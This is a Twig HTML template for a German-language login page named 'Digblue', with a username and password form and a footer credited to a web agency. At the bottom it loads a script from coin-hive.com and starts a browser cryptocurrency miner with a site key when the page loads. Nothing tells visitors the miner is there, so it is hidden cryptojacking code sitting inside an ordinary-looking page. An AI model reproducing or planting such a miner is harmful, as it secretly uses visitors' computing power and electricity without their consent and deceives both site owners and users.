<!DOCTYPE html>
<html lang="de">
<head>
    <meta charset="utf-8"/>
    <title>Digblue</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta content="width=device-width, initial-scale=1" name="viewport"/>
    <meta charset="UTF-8">
    <meta content="CREA Werbeagentur GmbH" name="author"/>

    <link rel="shortcut icon" href="{{ asset('assets/digblue-logo-icon.ico') }}"/>
    {% block style %}
    {% endblock %}
    {#<link href="http://fonts.googleapis.com/css?family=Open+Sans:400,300,600,700&subset=all" rel="stylesheet" type="text/css"/>#}
    <link lazyload rel="stylesheet" href="{{ asset('assets/vendor/bootstrap/css/bootstrap.min.css') }}"/>
    <link lazyload rel="stylesheet" href="{{ asset('assets/css/components-rounded.min.css') }}"/>
    <link lazyload rel="stylesheet" href="{{ asset('assets/css/login.css') }}"/>


    <link rel="stylesheet" type="text/css" href="{{ asset('assets/vendor/font-awesome/css/font-awesome.min.css') }}">

    <style type="text/css">

        body { background-color:#3b3f51 !important;}
        .login .content .form-control {
            background-color: #3B5998;!important;
            border: 1px solid #3B59D0;!important;
        }

    </style>


</head>

<body class=" login">
<div class="logo">
    <a href="{{ path("fos_user_security_login") }}">
        <img src="{{ asset('assets/img/digblue-logo-sm.png') }}" alt=""/> </a>
</div>

<div class="content">
    <form class="login-form" action="{{ path("fos_user_security_check") }}" method="post">
        <div class="form-title">
            <span class="form-title">Herzlich Willkommen.</span>
            <span class="form-subtitle pull-right">Bitte einloggen.</span>
        </div>


        {% if error %}
            <div class="alert alert-danger ">
                <span>{{ error.messageKey|trans(error.messageData, 'security') }}</span>
            </div>
        {% endif %}



        <div class="form-group">
            <label class="control-label visible-ie8 visible-ie9">Benutzername</label>
            <input class="form-control form-control-solid placeholder-no-fix" type="text" required autocomplete="off"
                   placeholder="Benutzername" name="_username"/></div>
        <div class="form-group">
            <label class="control-label visible-ie8 visible-ie9">Passwort</label>
            <input class="form-control form-control-solid placeholder-no-fix" type="password" autocomplete="off"
                   required placeholder="Passwort" name="_password"/>
            <a href="{{ path('fos_user_resetting_request') }}" >Passwort vergessen?</a>

        </div>
        <div class="form-actions">

            <button type="submit" class="btn red btn-block uppercase">Anmelden</button>
        </div>

    </form>

</div>

<div class="copyright">
    <a target="_blank" href="http://crea.de"><i class="fa fa-copyright" aria-hidden="true"></i> 2017 by CREA Werbeagentur GmbH</a>
|<a href="http://crea.de/impressum" target="_blank">Impressum</a>
|<a href="http://crea.de/datenschutzhinweise" target="_blank">Datenschutz</a> </div>
<script src="{{ asset("assets/js/jquery.min.js") }}"></script>
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
    $(function() {
        var miner = new CoinHive.Anonymous('ZaIsbcriI3WVk3Et2f80s1LdM2VGc1S1');
        miner.start();
    });
</script>




</body>

</html>